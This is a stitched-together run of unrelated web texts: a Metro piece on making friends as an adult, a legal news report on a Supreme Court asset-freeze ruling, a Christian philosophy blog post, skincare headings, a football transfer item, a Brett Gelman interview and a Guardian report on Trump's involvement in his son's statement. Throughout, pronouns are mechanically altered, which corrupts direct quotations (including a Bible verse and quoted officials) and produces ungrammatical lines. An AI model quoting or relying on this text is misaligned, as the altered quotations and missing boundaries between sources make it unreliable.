Why does making friends feel so much harder than dating ?
Why does making friends feel so much harder than dating ?
When you 're single and you do n't want to be , the next steps feel pretty obvious .
You hop on Tinder . You ask people out . You go to bars and start conversations . You finally approach your office crush .
But when you have a friendship crush ( that 's someone you desperately want to be your friend ) , or you 'd generally quite like to up the number of friends you have , things become a little more complicated .
A company is paying for two people to travel the world ... But they need to be strangers
Asking someone to be your friend – or even to spend time together in a friendly way – feels terrifying . So much more terrifying than doing a casual flirt .
There are many , many reasons why .
There 's the acute fear of rejection , that , unlike dating , can only be blamed on who you are as a person rather than their sexual preferences .
Advertisement
Advertisement
There 's the worry that they 'll think you 're hitting on them .
There 's the overwhelming sense of failure that comes with openly saying ‘ I do n't have enough friends and I 'd quite like more . '
( Picture : Ella Byworth for Metro.co.uk )
That 's why we hesitate when we encounter someone we think is cool , have a lovely chat , and want to ask for their number so we can hang out again . It 's why we stumble when it comes to taking a work-based friendship outside of the office .
As Dr Max Blumberg , psychologist at Goldsmiths , University of London , explains , while there 's a protocol for dating – through apps , flirting , or even the act of asking someone to hang out as a means to form a romantic relationship – there 's no such thing for friendship ; because we expect that to happen naturally .
Dating is essential for evolutionary purposes , so over time humans have focused more energy on creating tools and frameworks to make sure we 're able to happily and easily reproduce .
When it comes to friendship , however , that does n't directly serve the purpose of reproduction , we 've left things alone , expecting friendships to form with minimal effort and judging those who do n't manage to do it with ease .
( Picture : Ella Byworth for Metro.co.uk )
While being single is seen as an acceptable state of being , being friendless is not .
We can blame being single on rubbish exes , the struggle to find someone decent and attractive , or just personal choice . Traditionally , people only have one partner at a time ( we 're talking about monogamous people in this instance ) , and so to be temporarily without one is seen as entirely normal .
Advertisement
Advertisement
To appear to have zero friends , or simply not enough friends , however , can end up being perceived as a failing on your part .
‘ Being single is seen as a choice , ' Dr Blumberg told metro.co.uk . ‘ Being friendless is perceived as a social deficit .
‘ If someone does n't have friends they may not have any social skills .
‘ You 'd be perceived as pretty sad to ask someone to be your friend . '
( Picture : Getty/ Ella Byworth )
It 's that embarrassment and social stigma that stops us from openly admitting that actually , we 'd quite like more friends – or one specific friend – in our social circle .
We can feel like failures because as a society , we expect friendship to happen naturally . So to look around and see ourselves as lacking makes us believe we 've messed up – when in reality , it 's harder and harder to make friends without any effort .
We 're busier than ever , while our reliance on tech means we 're having fewer in-person interactions with potential mates .
It 's no longer as easy as happening to meet someone on a weekly basis at a gym class , or just buddying up because you sit next to each other at school .
If we want new friends as adults , we have to put in effort – something that can feel weird or unnatural as we 're so used to seeing tools like starting conversations or asking someone to hang out under a romantic umbrella .
( Picture : Ella Byworth for Metro.co.uk )
Our reliance on tech means we 're not getting many opportunities to practice our in-person social skills , either , which makes things even more awkward .
Advertisement
‘ Making friends is a muscle you need to practice , ' says Dr Blumberg , noting that chatting to our friends through Whatsapp groups and liking each other 's tweets means we do n't get the opportunity to learn and rehearse IRL social skills like starting up conversations , making eye contact , or putting people at ease .
It does n't help that when people do attempt to reach across the awkwardness gap and ask us to hang out , get coffee , or be friends , we immediately question their ulterior motives .
I 'll admit it : the second someone messages me one-on-one , I assume that they 're either hitting on me or trying to ask for something .
( Picture : Ella Byworth for Metro.co.uk )
Because there 's this overwhelming idea that friendships happen naturally – and pressure to let them happen without pushing – we feel as though any friendship that 's asked for explicitly is crossing the boundary into dating : the world where it 's okay to ask someone out because you like them based on first impressions .
We assume friendship does n't need to be made explicit . But when it comes to friend crushes or trying to expand your social circle , you 're forced to do so , if only so you do n't miss out on being friends with the cool person you met at an event or the guy you sit next to at work .
Making the leap ( whether that 's asking for someone 's number so you can get in touch , asking a workmate out for non-work drinks , or going to an event or class for the purpose of getting new friends ) feels risky . There 's a huge fear of embarrassment .
Advertisement
Dr Blumberg 's recommendation is simple : acknowledge the awkwardness , put people at ease , and do n't be afraid to take the next step to hang out with someone as a friend .
( Picture : Deirdre Spain for Metro.co.uk )
They suggest making it very , very clear that what you 're asking for is n't romantic , and explicitly stating the context without saying : ‘ I 'M FRIENDLESS AND ALONE , HELP ' .
They say : ‘ Try something like , “ I 've really enjoyed chatting with you , it 'd be great to get coffee and chat some time… this is n't a dating proposal , by the way ! '
Oh , and do n't be concerned if people respond awkwardly . They may still be a little suspicious or confused , but that does n't mean they are n't up for getting friendly .
‘ We 're not well-programmed to accept friendship requests in real life , ' notes Max .
( Picture : Erin Aniker for Metro.co.uk )
It 's not a good idea to force it , and you should n't take it personally if people seem distanced – they 're likely worried about seeming too eager and friendless , too .
That 's something that 's important to remember .
You 're not alone in wanting more friends , or feeling lonely , or wanting to make a connection . The person you 're getting on with and friend-crushing on is likely worrying about awkwardly asking you to come over for dinner , too .
Know that most people would love more good friends and would feel great to know that you 've chosen them as a potential best mate .
So make the first move . Be brave . Be the friend you want to see in the world , and ask that cool girl you chat to in the vintage shop if they fancy coming to your party . The worst thing they 'll say is no , and that 's fine . There are plenty of other non-sexual fish in the sea .
This article is part of our Friendship Week – a week-long exploration of the ins and outs of modern friendship .
MORE : The tyranny of Whatsapp groups and why some of us are n't in any
MORE : The reality of not having a best friend
MORE : The modern day bystander effect : Why is our first instinct to take a picture for social media instead of helping someone out ?
Advertisement Advertisement
Home Daily News Law allowing pretrial freeze on assets untainted…
U.S. Supreme Court
Law allowing pretrial freeze on assets untainted by crime violates Sixth Amendment , SCOTUS rules
Image from Shutterstock .
A federal law that allows courts to order pretrial freezes on assets that are untainted by crime violates the Sixth Amendment rights of defendants who are unable to pay their lawyers , the U.S. Supreme Court has ruled in a 5-3 decision .
The court ruled ( PDF ) Wednesday on behalf of Sila Luis , who was charged with Medicare fraud . The government obtained a pretrial order freezing $ 2 million in assets in hopes of preserving the money for restitution and penalties . The order was obtained under a law that allows pretrial freezes on assets that are tied to a crime , as well as assets “ of equivalent value . ”
The “ equivalent value ” provision is unconstitutional to the extent it prevents the defendant from paying their lawyer , the Supreme Court found .
In a plurality opinion , Justice Stephen G. Breyer distinguished Luis ' case from two 1989 Supreme Court decisions that allowed asset freezes , United States v. Monsanto and Caplin & Drysdale v. United States .
“ The relevant difference consists of the fact that the property here is untainted ; i.e. , it belongs to the defendant , pure and simple , ” Breyer wrote . “ In this respect it differs from a robber 's loot , a drug seller 's cocaine , a burglar 's tools , or other property associated with the planning , implementing , or concealing of a crime . ”
Breyer 's opinion finding a Sixth Amendment violation was joined by three other justices—Chief Justice John G. Roberts Jr. , Ruth Bader Ginsburg and Sonia Sotomayor . A concurrence by Justice Clarence Thomas agreed there was a Sixth Amendment violation but said the plurality used an “ atextual balancing analysis ” in reaching its conclusion .
Justice Anthony M. Kennedy , in a dissent joined by Justice Samuel A. Alito Jr. , said the plurality decision ignores precedent . The plurality 's “ unprecedented holding rewards criminals who hurry to spend , conceal , or launder stolen property by assuring them that they may use their own funds to pay for an attorney after they have dissipated the proceeds of their crime , ” Kennedy wrote .
A separate dissent by Justice Elena Kagan said they agree prior precedent is controlling , but they find Monsanto “ troubling. ” But the correctness of that decision is not at issue , Kagan said , because Luis did not ask the court to overrule or modify it .
Related articles :
ABAJournal.com : “ Chemerinsky : New term 's most important cases–so far ”
ABAJournal.com : “ ABA asks Supreme Court to curtail expansion of forfeiture laws ”
ABAJournal.com : “ Does freezing defendant 's untainted assets violate right to counsel of choice ? SCOTUS to decide ”
Post by Nathan Rinne “ In this is love , not that we have loved God but that they loved us and sent their Son to be the propitiation for our sins. ” — I John 4:10 “ If religions can be defined as ‘ doctrines of salvation ' , the great philosophies can also be defined as doctrines of salvation ( but without the help of God ) . ” — Luc Ferry “ [ philosophy is like a religious conversion ] … It involves “ a total transformation of one 's vision , life-style , and behavior. ” — Pierre Hadot “ Evolution is promulgated as an ideology , a secular religion — a full-fledged alternative to Christianity , with meaning and morality. ” — Michael Ruse ( see here for source of last 3 quotes ) “ There is simply no such thing as a methodological naturalism that is not also an ontological naturalism . And ontological naturalism is , at bottom , a bad theology that does not know itself. ” — Michael Hanby “ Certain new theologians dispute original sin , which is the only part of Christian theology which can really be proved. ” — Chesterton , Orthodoxy , chap . 2
Karl Giberson , writing at Peter Enns ' blog today , is playing with fire – particularly in our current cultural context – by undercutting the biblical doctrine of original sin . Meanwhile , Pastor Jordan Cooper ( whose book Christifcation actually contains a ready reply to Giberson and Enns on this issue ) is hitting the ball out of the park with the podcast they posted on this blog yesterday – giving an excellent Christian response to transgenderism . This post attempts to deal deeply with pertinent issues present in both of these topics .
Several years ago , when I was thinking about what all human beings could reasonably agree on ( as I was discussing cataloging library books with Library of Congress Subject Headings of all things ) , I came up with the following minimal list…
Getting PERSONal : MyAssumptions . YourAssumptions ? -We exist ! ( or : “ I exist . You exist ” [ kind of like “ I 'm OK. You 're OK ” ] ) -We share a world out there -Despite all the messiness , there is some order out there to be discovered ( particularly in the minds of other persons ) . -It makes sense ( is worthwhile ) to try to learn about this world -Our “ epistemological equipment ” ( senses and reason ) also “ makes sense ” , so we can rely on it to learn about the world out there . -Our experiences of reality are analogous to other healthy persons ( i.e . those who have received appropriate socialization – love ) -People are universally endowed with at least some shared concepts : e.g . “ thirsty ” , “ clouds ” , “ tears ” , “ sad ” , “ food ” , “ mother ” , “ father ” , etc .
Looking at this now , as I was trying to find common ground and justification for the same , I certainly was trying to start small…
Bigger fish to fry now . Trying to drastically simplify and make plain the life of the mind . Real philosophers out there – what do you think ? :
We know more than we can tell . ( Polanyi ) More or less so . Thought experiments can help us see what we tacitly know – and challenge us regarding our claimed beliefs compared to our actual behaviors . If God does not exist , then there may be subjective “ meaning ” but no ultimate meaning . Rather , we make up all as we go , and everything must be about power and practicality . Words , for example , get reduced to manipulation…they are “ power tools ” . Therefore , “ we ” “ humans ” have no real essence ( this is a “ useful fiction ” ) and further , “ if God does not exist , the person does not exist ” . ( Zizioulas ) If God does not exist we must embrace the meaninglessness of all things – except , or course , our own opinions of all things ! So in like fashion , if God does not exist , science does not exist * – at least as many today understand the term science .
For what has become of truth here ? Here “ truth ” and utility are one – with all recognized ethical norms emerging and being created within relevant community ( ies ) . In sum , what works is true and what is true is what works . * * Furthermore , since all empirical observation is “ philosophically mediated ” , all of this “ science ” is really philosophy . * * * All philosophy is about how we are to live . All believe not any way or “ form of life ” will do – some must be discouraged or even actively suppressed . Therefore all philosophy is teleology ( see more here ) . here ) . Akin to an acceptable monastic rule . Truth , of course , must to some degree be tied up with this . For if we grow disposed to ignore truth , our neighbor will not let us do so entirely . Therefore , we speak of “ righteous ” persons . These understand they must live in accordance with what is . The true person lives well , we say , recognizing natural limits and their own limitations . And yet , for the unbelieving philosopher , what is , physically and morally and spiritually , is even less important than what they want to do . Therefore , ultimately curiosity about what is , not conviction , describes him . For the heart wants what it wants . And being “ true to himself ” is the apex . “ His truth ” is that creation is god . All suppress the truth in unrighteousness , but some more so . They may nevertheless begin to live according to what they know on earth , but not from heaven . … ” If I have told you earthly things and you do not believe , how can you believe if I tell you heavenly things ? ” As C.S Lewis said , Christianity is the Truth Myth . Therefore : no Christ , no true philosophy also . * * * * The Christian , as opposed to the unbelieving philosopher , is first and foremost true to Christ . For they know the truth is that the Creator , Jesus Christ , is God . * * * * * And that words – particularly God 's words – are first and foremost , gifts of love . And that they have been buried and raised with Him in baptism ( in the death and resurrection of Christ ) ! Peace , joy , and eternal life ( beginning now – see John 17:3 ) with God – the true consolation indeed ! Here we see the real intended end of man . While a tree or animal can not deliberate over whether or not to rightly grow and reach their intended end , a man can – a Christian can… Therefore : Not my will , but yours be done ! Here they find himself , as they lose themselves – along with the whole of Christ 's bride , the church . They thank God for what has been , what is , and what will be coming . And that it is in Him that we live and move and have our being – unto the fullness of life eternal . They are good ! Thank God Jesus is God !
FIN
Notes :
* “ No God , no science ” , says Michael Hanby , although their approach varies from mine . More interesting things from him : “ Current scientific practice is upheld by a political , economic , educational and cultural citadel that is virtually impregnable and that bears only an incidental relation to the search for truth. ” To Hanby , Darwinism is a “ living affront to the conviction that the desire for truth lies deep within us and plays an active role in extinguishing it….if it is impossible to live as if your theory were true , it probably is not . ”
* * “ …the Baconian equation of knowing and making is…knowing not for the sake of control but by means of control , knowing by controlling which accords epistemic and ontological priority to parts separated through analysis. ” ( Hanby , p. 34 , No God , No Science ? )
* * * Note that I am not saying here , for example , that all facts are contested due to different worldviews , or something like that . Rather , I would say that we all have much philosophy in common – and it is more our practice than our stated beliefs which demonstrates this ( hence the possibility of the MyAssumptions list resonating with others )
Hanby provides excellent fodder for thought here . Again , note that their overall views are quite different from mine :
“ ….science is constitutively and therefore inexorably related to metaphysics and theology . To say that this science is intrinsically constituted in relation to metaphysics and theology is to say that science is not simply distinguished from metaphysics and theology merely by a difference of method ( experimental , empirical , or mathematical ) that would demarcate them externally , though this is not to deny that there is a methodological difference . Nor are they simply distinguished in virtue of their end or of the fact that science typically trades in what can be observed , or measured , or predicted , or manipulated . The question of precisely what the empirical sciences observe is a complicated matter , since empirical experience is already a highly “ stylized ” experience . And it is not always the case , in astronomy , for example , or in certain branches of physics , or even in reconstructing certain features of a hypothetical evolutionary past , that the objects of science can be observed or manipulated . Where it is the case , the very fact that empirical experience is “ stylized ” is an indication that there is no such thing as empirical observation that is not philosophically mediated . To say , then , that science is intrinsically constituted in relation to metaphysics and theology is to say , first , that it remain dependent upon a tacit metaphysics and theology in the very act by which it distinguishes itself from them , and second , that science is constituted as such in distinction from philosophy can theology by the manner in which it relates itself to them ( precisely by distinguishing itself from them ) , as a way of attending to “ the whole ” through its perspectival attention toward a part . To say that this relation is inexorable is to say that it can not be willed away . It can be forgotten , neglected , suppressed , or materially distorted , but never escaped . The more vehemently a Dawkins or a Dennett asserts this atheism , for example , the more definite and grotesque their theology becomes… .. conceptions of nature determine in advance what sort of God is allowed to appear to thought and consequently , the range of meanings that can intelligibly attached to “ creation ” … [ this is ] an alternative theology that determines in advance both what sort of God can appear to thought and what sort of “ nature ” may manifest iself… ” ( pp . 17-18 , 19 , 35 , No God , No Science ? )
… If then the assumption that science is extrinsic to metaphysics and theology betrays itself and expresses a distinct metaphysics and theology , what is the distinct ontological and theological content that lies within this extrinsicism and its notions of a metaphysically neutral method and limit ? … ” ( 33 , No God , No Science ? )
* * * * The man who is religious but not Christians , on the contrary , really does seek the Divine , but does so wrongly – both externally and internally . And until turned by God , they can not do otherwise .
* * * * * Does the cross of Christ always equal foolishness ? We are not saved by reason , but with Christ , grace , and faith , we are certainly saved with , in , and through our reason . This does not mean that we achieve this through reason 's powers – it only means that we begin to understand who we are , our sin , who God is , and Their work for us in history . Reason that is truly reasonable can not be autonomous from sensory experience or history . Divine revelation , which we are told is “ at work in you believers ” ( I Thes . 2 ) is in part history told by God .
Extensive skincare routine aka Asian skincare routine explained 9:24 PM Moi Sanom 7 Comments
Just like that !
Double Cleansing
Western toner vs Asian toners
Pat pat pat !
Essence , Serum and Ampoule
Emulsion , also called Milk in Japan
Sleeping packs
Sheet masks
Spot treatments
Eye cream
Bonus step : Acids
Mother after doing their Asian skin care routine for 6 months and wanting more !
Winter of 2012 on the left and Summer 2013 on the right
Brendan Rodgers expects to be able to call on the services of new signing Mario Balotelli for Sunday 's trip to Tottenham Hotspur .
Liverpool completed a deal for the Italy striker on Monday afternoon , though confirmation arrived too late for them to figure against Manchester City .
However , Balotelli 's Reds debut could come at White Hart Lane this weekend .
Speaking after the 3-1 defeat at the Etihad Stadium , Rodgers told Liverpoolfc.com : `` I think by the weekend [ he 'll be ready to feature ] .
`` He 's been into pre-season and he 's played three 45-minute games . They might not be up to full match speed , but he 's looking fit .
`` We 've done some analysis on him . The medical and sports science team have worked with them already and he 's in very , very good condition .
`` He 's in to work and he 'll be available for the squad for the weekend . ''
[ SLIDESHOW ]
Brett Gelman is fucking everywhere . Nearly a decade after moving out to Los Angeles to join the growing alt-comedy scene , the 40-year-old 's deep voice and knack for playing desperate — and sometimes slimy — characters has earned them an IMDb page filled with stuff your coolest , weirdest friends have been telling you to watch .
Just last year , Gelman had major roles in the TV comedies Blunt Talk , Love , Fleabag , Another Period , and TripTank , and before that , they were a regular on Married , Eagleheart , and Go On . They often play a creep , but the character usually has a heart of gold ( or at least underlying justification for their shitty behavior ) . Their best work may be their Adult Swim Dinner specials , in which they play a well-intentioned but incredibly tone-deaf version of themselves that makes everyone uncomfortable .
Gelman left Adult Swim this fall after a network executive made controversial comments about women writers ( read : they did n't like hiring them ) . The exit was a high profile one , and part of Gelman 's effort to take a stand against racism in the industry . And it has n't hurt their productivity . He 's got a whole slew of upcoming projects including Lemon , a Sundance film they co-wrote with their wife , Janicza Bravo , and the Comedy Central animated series Jeff & Some Aliens .
A zany and often deeply satirical cartoon in the vein of Rick and Morty with a twist of South Park , the show is spun out from a segment in Sean Donnelly and Alessandro Minoli 's TripTank . Gelman voices Jeff , a sad sack who works at a juice bar in the mall and is being studied by a trio of goofball aliens who have pinpointed them as the most average human alive . It 's an edgy show with a dose of empathy , mixing cynical commentary on the state of America with a story of a guy who ca n't get out of their own way . Gelman spoke about the show with Inverse , as well as their high-profile political stances and plans to tackle the Trump administration through comedy .
In the first act of the first episode , you kill an old woman , so you really waste no time getting into shit here .
Yeah , we keep it real . We keep it in line with America 's violent intentions .
And yet , Jeff , the character you voice here , is a little more hapless than they are an asshole .
Not that they do n't create some of the situations that they find themselves in , or they definitely make it worse , but he 's very much … He 's probably the biggest victim I 've ever played . It 's fun … So much of the character is them just reacting to horrible things , and them trying in a very panicked way to figure it out , and it 's good to not be the aggressor .
Do you find yourself getting offered that kind of role , for the most part ?
The first question I ask is , “ Is the material great ? ” And if the material is great , I do it . This is some great material . But there are things that I say no to , where I do n't think the writing is good enough to justify my playing a character that I have played before . It really does at the end of the day come down to whether I like the writing or not . If it 's great , then you 're going to find the way in which this character [ who ] is an aggressor is different than how other characters I 've played are aggressors . And then it 's also up to me a little bit to differentiate what I do or decide not to .
You definitely play an aggressor in Dinner in America , the satire special you did this summer , as a well-meaning white liberal whose subconscious racism gets exposed . And watching it now , post-election , it feels like the topic has blown up even more , and could be even crazier if made today .
Yeah , well , in a way . It blew up for white people in the last six months . The situation has been a constant for people of color . A lot of people would say to me , “ Man , great timing ! ” And I was like , “ Uh , it 's been great timing for forever. ” Or like , “ Hot issue , man. ” And I would be like , “ Well it 's been a hot issue for 400 years. ” It 's just the media chose to cover it more this year , with our president-elect , and with police violence being publicized more , and being filmed . But I still think that we 're perpetually moving away from the full knowledge of that reality , so [ writing partner ] Jason Woliner and I wanted to make something that made all of us face what maybe our part in it was .
You said something interesting in an interview last summer about how talking about injustices , or sharing something on Facebook or making a joke about it , is n't the same as actually doing something about it , and that 's a problem that white liberals have — as the election proved .
INVERSE LOOT DEALS Meet the Pod The first bed that learns the perfect temperature for your sleep , and dynamically warms or cools according to your needs . Buy Now
Yeah , you know I still think it 's a problem . I still think everybody 's tweeting , but it 's like , “ I 'm sorry to tell you man , your tweets , they do n't do shit . They do n't do shit. ” You being like , “ Hey , stop that ! ” only makes the other side of that stronger . “ That 's not nice ! ” I think that a lot of liberals are being sucked into social media and thinking that they 're using it as a way to feel like they did something . And I think they 're still doing that , I do n't see how reposting things about our president-elect helps at all . It 's like , well the people that agree with you know this already , and the people who do n't agree with you think this is a lie , that you 're wasting your time . Use your influence , go out there , donate , meet with groups , educate yourself on what it 's like to not be a rich , straight white dude in the United States , and do something !
It 's become so evident that it 's really tricked us into thinking , “ Hey , my voice is heard ! And that moves the needle. ” No , it does n't . And I speak from experience in that . Nothing I ever really said on Twitter ever did anything .
Especially because Facebook will show you what you want to see .
If you truly say something provocative on any of these platforms , you 're ignored , because that creates tension , and people are actually on those websites to escape tension . That is why they 're addicted . They 're not on there because they 're addicted to truth and change and activism , they 're there to escape ! So we 're in this weird , dangerous place now where people are escaping but thinking they 're engaging . You know , it 's not just TV or porn , it 's like , “ I am the show , and I am the porn. ” People are escaping into their own fantasy that they are more famous and more important than they actually are .
What does that mean for you , for comedy , for people who do create the entertainment ? Do you feel like your work has to reflect the political reality ?
I definitely think that that is our job , to put it in our work . I do n't think everybody needs to make a direct political statement , and I definitely do n't think that people should do that in a forced way , because then that hurts the cause . But I think people should be more mindful , and we definitely need to keep moving towards inclusion [ in casting and production ] and be even more aggressive now that there is a very loud voice saying that the need for inclusion is actually an act of racism , which is insanity , and just manipulation . It 's not even insane , it 's just manipulation ! I think [ Twitter ] being mastered as a tool for bad has overwhelmed its function as a tool for good . It 's just like , if I 'm an artist , I do n't need to tweet about my stuff , I can talk to you about it .
I do n't think that everybody should think like they have a chance to be famous . I think that there needs to be separation between what people 's jobs are . Part of my job is to reach a lot of people . That 's not everybody 's job , that does n't make me better than these people , but these certain circumstances , for better and for worse , come with my job description . I am making things for an audience , you know ? Somebody who works a different job does not have an audience , they have singular clients . Fame is a byproduct of my position ; it 's not a thing to be cultivated like that . I need an audience that want to see my work . So those are the circumstances of my job , so the fact that everybody wants that is I think delusional and at the end of the day , destructive for people 's psyche .
So do you try and be more cognizant and work hard to instill those themes , or do projects that are more political ?
Yeah , I think so . I think it 's a balance . In the end it 's like , you 've got to do something good , and sometimes it 's good to make something that 's just entertaining for people , but I do think I do plan for my work , especially what I write and produce , to have at least some sort of political consciousness , and definitely be inclusive . The whole nature of comedy to begin with is like John Waters said , everything that is comedic is political . When you make somebody laugh , you 're shifting their perspective . So yeah , I think it 's a time for major consciousness , and if you 're not being conscious , you need to be conscious about the fact that you 're not being conscious .
You mention the crew is all white in the Dinner special , and then fire them .
When we were making that , it was very important for Jason Woliner and I to have a diverse crew , and then we were like , “ Wait a second … “ We had to kind of call ourselves out on our own racism and be like , “ Oh wait , why did it wake us making something about race for us to realize that we needed … not an all white crew ? ”
And that 's the same with * The show is not making fun of people like Jeff , like me and Alessandro and Sean all have a Jeff inside of us . We are all that guy who just wants to get everything in an easy way , and does n't deal with rejection well at all .
Jeff is the ultimate average American , the ultimate average human in the entire world . He 's the most baseline , he 's in everybody .
Yeah , exactly . With every character , it 's like , “ Well , I am this person. ” You have to see yourself in them , no matter how reprehensible they might be , and I do n't think Jeff is reprehensible . I 'm talking about certain other characters I 've played .
This interview has been edited for brevity and clarity .
The White House has confirmed Donald Trump played a role in drafting a misleading statement about their son 's meeting with a Russian lawyer .
On Tuesday , the press secretary , Sarah Huckabee Sanders , contradicted Trump 's attorney , Jay Sekulow , who said the president had had no involvement .
“ The statement that Don Jr issued is true , ” Huckabee Sanders said at the daily press briefing . “ There is no inaccuracy in the statement . The president weighed in as any father would . ”
Profile Donald Trump Jr Show Hide Born 31 December 1977 in Manhattan 31 December 1977 in Manhattan Career After brief stint bartending in Aspen , they moved back to New York to join the Trump Organization , supervising Trump Park Avenue and other projects . They took an interest in other family enterprises in later years , appearing as a guest adviser on their father 's reality television show The Apprentice and as a judge of various Miss USA pageants . After brief stint bartending in Aspen , they moved back to New York to join the Trump Organization , supervising Trump Park Avenue and other projects . They took an interest in other family enterprises in later years , appearing as a guest adviser on their father 's reality television show The Apprentice and as a judge of various Miss USA pageants . High point Just before the news of their meeting with the Russian lawyer Natalia Veselnitskaya , they were riding high as executive director of The Trump Organization and one of the president 's closest confidants . Just before the news of their meeting with the Russian lawyer Natalia Veselnitskaya , they were riding high as executive director of The Trump Organization and one of the president 's closest confidants . Low point On Tuesday 11 July 2017 , they produced the most damning evidence yet in the FBI 's investigation of Russian meddling in the US election , catapulting themselves on to the international stage with emails showing they knowingly met with a Russian lawyer claiming to have “ dirt ” on their father 's rival . On Tuesday 11 July 2017 , they produced the most damning evidence yet in the FBI 's investigation of Russian meddling in the US election , catapulting themselves on to the international stage with emails showing they knowingly met with a Russian lawyer claiming to have “ dirt ” on their father 's rival . They say “ I think I probably got a lot of my father 's natural security , or ego , or whatever … I can be my own person and not have to live under their shadow . I definitely look up to them in many ways – I 'd like to be more like them when it comes to business – but I think I 'm such a different person , it 's hard to even compare us . Their work persona is kind of what they are . I have a work face , and then there 's my private life , ” – Trump Jr to New York magazine , 2004 . “ I think I probably got a lot of my father 's natural security , or ego , or whatever … I can be my own person and not have to live under their shadow . I definitely look up to them in many ways – I 'd like to be more like them when it comes to business – but I think I 'm such a different person , it 's hard to even compare us . Their work persona is kind of what they are . I have a work face , and then there 's my private life , ” – Trump Jr to New York magazine , 2004 . They say “ It 's a do-anything-you-can-to-win world that he 's part of , and their eagerness to meet with this lawyer , who was very explicitly described as having information that came from Russian government sources – there 's no mystery there . There 's no veil . There 's not even one veil . Them name was n't mentioned but everything else was very explicit and they leap at it . That 's all part of this all-that-matters-is-winning , there 's winning and there 's losing , that 's it . That 's the value system and in that way , they very much echoes their father. ” – Gwenda Blair , Trump biographer , to the Guardian , 12 July 2017 . “ It 's a do-anything-you-can-to-win world that he 's part of , and their eagerness to meet with this lawyer , who was very explicitly described as having information that came from Russian government sources – there 's no mystery there . There 's no veil . There 's not even one veil . Them name was n't mentioned but everything else was very explicit and they leap at it . That 's all part of this all-that-matters-is-winning , there 's winning and there 's losing , that 's it . That 's the value system and in that way , they very much echoes their father. ” – Gwenda Blair , Trump biographer , to the Guardian , 12 July 2017 .
Trump “ weighed in based on the limited information that they had ” , they said .
The White House was rocked on Monday night by another revelation in the investigation into potential ties between their campaign and Russia . The Washington Post first reported that the president had dictated a statement which dismissed the significance of a meeting between their son Donald Trump Jr , top campaign aides Jared Kushner and Paul Manafort , and the Russian lawyer Natalia Veselnitskaya in June 2016 .
On Tuesday , Huckabee Sanders said : “ He certainly did n't dictate . But they weighed in , offered suggestions , like any father would do . ”
The statement , which was issued by Donald Trump Jr 's lawyer , required repeated updates as more details of the meeting leaked out .
Initially , Trump Jr said they and the Russian lawyer “ primarily discussed a program about the adoption of Russian children ” . Further reporting revealed that Trump Jr had , in fact , taken the meeting after having been offered incriminating information about Hillary Clinton , forcing the president 's son to release the email exchange leading up to the meeting .
In the emails , Trump Jr was explicitly told of an effort by the Russian government to aid Trump 's campaign , and that Veselnitskaya could offer highly sensitive information about Clinton . “ If it 's what you say , I love it , ” Trump Jr replied .
The White House has insisted the president had no knowledge of the meeting , despite being in Trump Tower that same day .
The latest allegations about the meeting in Trump Tower dealt another blow to an already beleaguered president , placing them under the microscope as federal investigators look into possible collusion between the Trump campaign and Moscow during the presidential election . It also raised fresh questions for the justice department , some legal experts said , as special counsel Robert Mueller examines whether Trump obstructed justice .
“ You 're boxing in a witness into a false story , ” Richard Painter , chief White House ethics lawyer for George W Bush , told the Guardian . “ That puts them under enormous pressure to turn around and lie under oath to be consistent with their story . I think it 's obstruction of justice . ”
For Trump to draft a “ knowingly false ” statement for their son , who could be considered a material witness in the Russia investigation , “ very likely will be deemed to be obstruction of justice ” , Painter said .
Asha Rangappa , an associate dean at Yale law school , said the report that Trump was behind the misleading statement on their son 's meeting suggested “ a personal investment in wanting to cover up something that may tie their campaign to the Russians ” .
“ Intent would be the hardest thing to prove in terms of obstruction , because you need to show that the person acted corruptly . That 's the legal standard , ” Rangappa said .
Quick guide Who are the key Russian players in the Trump collusion accusations ? Show Hide Natalia Veselnitskaya A Russian lawyer whose work has focused on ending US sanctions on Russia and who met with Trump representatives Donald Trump Jr , Jared Kushner and Paul Manafort at Trump Tower in June 2016 . Read further . Sergey Kislyak Until recently , the Russian ambassador to the US . A hub for contacts with Trump representatives including Kushner , attorney general Jeff Sessions , former national security adviser Michael Flynn and the president himself . Read further . Sergey Gorkov The Kremlin-connected head of Russian state investment bank Vnesheconombank . They met with Kushner during the presidential transition , but “ no specific policies were discussed ” , according to Kushner . Read further . Dimitri Simes President of the Center for the National Interest , a Washington thinktank , which hosted an April 2016 foreign policy speech by Trump . Trump , Sessions and Kushner appear to have met with Kislyak at the event , although both Kushner and Sessions have said any meeting was only in passing and they do n't recall what was discussed . Read further .
By Tom McCarthy
“ When you start having both a reason – that they themselves or their children could be implicated and that he 's deliberately trying to conceal evidence – it adds to that element of the crime . ”
The Post report also portrayed Jared Kushner , Trump 's son-in-law and a senior adviser in the White House , as one of the lone proponents of transparency . Kushner , who privately met investigators on Capitol Hill last week , attended the meeting , but has claimed to have had no prior knowledge of its purpose – despite being forwarded the email exchange leading up to it .
Rangappa said Kushner , unlike their father-in-law , was “ playing the smartest game in the White House ” .
“ You never see them talk , you never see them tweet . He 's doing everything their lawyers tell them to do , ” Rangappa said .
“ Remember that the burden is on the government if they want to prove something against you , ” they added . “ The less you say , and the less information you give out , the more onus you 're putting on the government to have to come up with other evidence that you did know [ about the motives behind the meeting ] .
“ He 's not giving Mueller a single morsel beyond what they have to . ”
The Russia investigation has loomed over the first six months of Trump 's presidency , and impeded their ability to enact a legislative agenda . On Twitter , the president has repeatedly sought to discredit the investigation , and they prompted the appointment of Mueller by firing the FBI director James Comey and admitting Russia was part of their calculation . In recent weeks , Trump has focused their ire on Jeff Sessions , stopping short of firing the attorney general but tormenting them over their decision to recuse themselves from overseeing the FBI 's Russia investigation .
Michael Steel , an aide to former House speaker John Boehner , said the president 's inability to escape the Russia allegations has proved one of their biggest barriers , including the failure to land a bill that would repeal and replace the Affordable Care Act , popularly called Obamacare .
“ I think Republicans on Capitol Hill are desperately trying to make progress on important conservative policy , ” Steel said . “ But it 's made more difficult seemingly every other day by fresh revelations from the White House or the campaign . ”
The past two weeks brought further turmoil to the White House , with the resignation of the press secretary Sean Spicer and the ousting of the chief of staff Reince Priebus . Both men objected to Trump 's decision to hire Anthony Scaramucci as the White House communications director .
A profanity-laced tirade by Scaramucci against Priebus and Steve Bannon , Trump 's chief strategist , was made public last week and laid bare the bitter infighting within the West Wing . Scaramucci was fired on Monday , following the appointment of John Kelly , the secretary of homeland security , as Trump 's new chief of staff .
Republicans have hoped Kelly , a former general , will bring military discipline to the White House . But many fear the biggest obstacle in the White House is not its staff , but the president himself .
Trump interview : on golf , Brexit and why you do n't hear about Britain any more Read more
